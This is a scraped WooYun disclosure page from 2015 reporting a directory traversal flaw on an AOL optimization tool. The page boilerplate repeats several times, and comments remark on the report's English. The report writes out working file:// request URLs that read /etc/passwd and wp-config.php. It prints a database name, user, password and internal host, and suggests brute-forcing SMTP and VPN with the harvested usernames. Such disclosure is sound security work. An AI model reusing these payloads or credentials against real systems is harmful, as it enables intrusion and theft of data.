Directory traversal on *.aol.com [2](db password leaked)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096848

漏洞标题：Directory traversal on *.aol.com [2](db password leaked)

漏洞作者： lijiejie

提交时间：2015-02-11 20:30

修复时间：2015-03-28 20:32

公开时间：2015-03-28 20:32

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-11：细节已通知厂商并且等待厂商处理中
2015-02-11：厂商已经确认，细节仅向厂商公开
2015-02-21：细节向核心白帽子及相关领域专家公开
2015-03-03：细节向普通白帽子公开
2015-03-13：细节向实习白帽子公开
2015-03-28：细节向公众公开

简要描述：

Directory traversal on *.aol.com [2](db password leaked)

详细说明：

Directory traversal:

http://optimization.aol.com/tools/roboto/?url=file:///etc/passwd

With file protocol(file:///) we can read local files, more than 800 employee's usernames can be downloaded, which can be used to brute SMTP, VPN and other services.
I use these usernames to fuzz .bash_history accessibility with Burp Suite.

Finally, I found file:///home/dpadmin/.bash_history.
db password:

http://optimization.aol.com/tools/roboto/?url=file:///data/servers/optimization_apache/htdocs/wp-config.php
define('DB_NAME', 'optimization');
define('DB_USER', 'optimizer');
define('DB_PASSWORD', '0pt1m123');
define('DB_HOST', 'opti-db-vm-ld01.iwebsys.aol.com:3406');

漏洞证明：

修复方案：

add url filter, no file protocol allowed

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-02-11 23:42

厂商回复：

漏洞评价：

2015-02-11 20:32 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子，温润如玉)

what the hell?!
2015-02-11 20:32 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

李姐姐好英语
2015-02-11 20:34 | 默秒全 ( 路人 | Rank:2 漏洞数:3 | a....)

shenmegui
2015-02-11 20:39 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1：5 无限量收 [平台担保]))

完全看不懂
2015-02-11 20:44 | 安然意境 ( 普通白帽子 | Rank:189 漏洞数:79 | 无论是你的事业还是你的个人，可能走的过程...)

漏洞内容描述、漏洞证明也是纯英文么 O(∩_∩)O~
2015-02-11 20:45 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子，温润如玉)

@_Thorns 域传送漏洞
2015-02-11 20:46 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子，温润如玉)

@_Thorns 翻译错了。目录遍历
2015-02-11 20:48 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

李姐姐是外语学院的院花。
2015-02-11 21:02 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

Good English
2015-02-12 09:25 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

全英文啊
2015-03-01 17:26 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

@xsser show 英文我也会 http://www.wooyun.org/bugs/wooyun-2015-098933/trace/47b1558ac49ca7e30e3a99ca299a086dhttp://www.wooyun.org/bugs/wooyun-2015-098931/trace/75cf011679c058d300bfcc23939a3c96http://www.wooyun.org/bugs/wooyun-2015-098925/trace/8538195123c40099747efdce34fb32d9求审核
2015-03-28 21:56 | Ztz ( 普通白帽子 | Rank:152 漏洞数:40 | 自由职业)

aol这次怎么不回复了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096848

漏洞标题：Directory traversal on *.aol.com [2](db password leaked)

相关厂商：aol.com

漏洞作者： lijiejie

提交时间：2015-02-11 20:30

修复时间：2015-03-28 20:32

公开时间：2015-03-28 20:32

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-096848

漏洞标题：Directory traversal on *.aol.com [2](db password leaked)

相关厂商：aol.com

漏洞作者： lijiejie

提交时间：2015-02-11 20:30

修复时间：2015-03-28 20:32

公开时间：2015-03-28 20:32

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-096848"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：